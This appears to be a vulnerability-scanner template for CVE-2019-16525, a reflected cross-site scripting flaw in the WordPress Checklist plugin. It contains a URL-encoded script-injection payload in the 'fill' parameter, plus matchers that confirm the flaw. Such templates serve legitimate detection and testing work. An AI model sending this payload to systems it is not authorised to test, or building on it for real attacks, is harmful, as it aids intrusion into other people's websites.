id: CVE-2019-16525 info: name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2019-16525 cwe-id: CWE-79 requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - "" part: body - type: word part: header words: - text/html - type: status status: - 200